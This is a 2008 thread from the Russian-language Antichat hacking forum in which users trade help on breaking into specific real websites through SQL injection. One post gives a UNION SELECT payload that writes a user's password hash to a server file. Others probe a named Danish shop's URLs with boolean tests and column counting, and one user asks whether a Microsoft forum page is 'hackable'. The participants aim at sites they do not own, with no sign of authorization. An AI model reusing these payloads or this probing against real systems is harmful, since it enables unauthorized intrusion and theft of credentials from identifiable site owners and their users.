HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.12.2008, 03:00
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

[QUOTE=DimOnOID]а)Если только фряха если я не ошибаюсь...
насчёт б согласен..можно ещё поискать на сайте раскрытие путей....ну или погуглить этот сайт на ошибки ...насчтё конфигов вот темка
/QUOTE]

У мя конфиги не читались на фряшке =_=,точнее,на двух.Пад рутом...
 
Ответить с цитированием

  #2  
Старый 06.12.2008, 00:15
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

InvisibleSM, Прорекламирую мою тулзу тебе в помощь =\

https://forum.antichat.ru/thread79411.html
 
Ответить с цитированием

  #3  
Старый 06.12.2008, 00:32
AHMED HASSAN
Новичок
Регистрация: 25.04.2007
Сообщений: 16
С нами: 10023542

Репутация: 1
По умолчанию

hi

sorry for english

is this hackable

http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43&PostID=4186769

waitting>>>>>>>>>>>
 
Ответить с цитированием

  #4  
Старый 06.12.2008, 00:38
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами: 9387494

Репутация: 36
По умолчанию

http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43'&PostID=4186769 hmmmm
it may well be that filtration ' ! Not good!!!

-------------------------------------------
No man!!!it cannot be said : this unhackable! Search some different ways!!!

Последний раз редактировалось BanQui; 06.12.2008 в 00:44..
 
Ответить с цитированием

  #5  
Старый 06.12.2008, 02:00
InvisibleSM
Новичок
Регистрация: 03.12.2008
Сообщений: 8
С нами: 9177163

Репутация: 1
По умолчанию

блин забыл самое главное написать, там нет выводимых полей там бага в мейл поле при регистрации поэтому только аут файл могу сделать

во что пишу

' union select passhash from users where id=1 into outfile '/tmp/1.txt'/* -- @bla.ua

а прочитать терь как, хз

на ошибки гуглил, нету

Последний раз редактировалось InvisibleSM; 06.12.2008 в 02:06..
 
Ответить с цитированием

  #6  
Старый 06.12.2008, 06:11
zenon2
Новичок
Регистрация: 25.10.2006
Сообщений: 10
С нами: 10285880

Репутация: 1
По умолчанию

Народ помогите разобрать что то непонимаю что к чему http://www.viper-shop.dk/category.php?id=180'

Ругается что не правильный синтаксис и все тут. Уже все перепробовал. В чем ошибка?
 
Ответить с цитированием

  #7  
Старый 06.12.2008, 07:11
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию

http://www.viper-shop.dk/category.php?id=180+and+1=1

интересно что же ты перепробовал... Не знаешь - не лезь или учись...
 
Ответить с цитированием

  #8  
Старый 06.12.2008, 07:21
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию

Цитата:
Сообщение от o3,14um  
http://www.viper-shop.dk/category.php?id=180+and+1=1

интересно что же ты перепробовал... Не знаешь - не лезь или учись...
чтото я не понял сути поста .. может мне тоже учится пойти надо...
кол-во колонок, обычно так ищут ..
http://www.viper-shop.dk/category.php?id=180'+order+by+16/*
так что делаем вывод, 15 колонок .. можно в ошибке посмотреть кол-во колонок, но там не то колво, ибо c.*
вывода не добился..
лучше поискать на сайте ещё скули, возможно проще будет, ну или эту поковырять ещё ..

Последний раз редактировалось 159932; 06.12.2008 в 07:24..
 
Ответить с цитированием

  #9  
Старый 06.12.2008, 07:46
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами: 9454841

Репутация: 504


По умолчанию

Цитата:
Сообщение от o3,14um  
http://www.viper-shop.dk/category.php?id=180+and+1=1

интересно что же ты перепробовал... Не знаешь - не лезь или учись...
ну тогда зайди и посмотри вывод
Цитата:
http://www.viper-shop.dk/category.php?id=180+and+1=1
и
Цитата:
http://www.viper-shop.dk/category.php?id=180+and+1=0
отличается чем-то?
и вообще с чего вдруг взяли что там sql-inj?
 
Ответить с цитированием

  #10  
Старый 06.12.2008, 12:41
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами: 9679872

Репутация: 347
По умолчанию

Цитата:
Сообщение от gisTy  
ну тогда зайди и посмотри выводиотличается чем-то?
и вообще с чего вдруг взяли что там sql-inj?
вот эти два вывода разные:

Код:
http://www.viper-shop.dk/category.php?id=179'+AND+'1'='1
http://www.viper-shop.dk/category.php?id=179'+AND+'1'='0
инъекция там есть.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.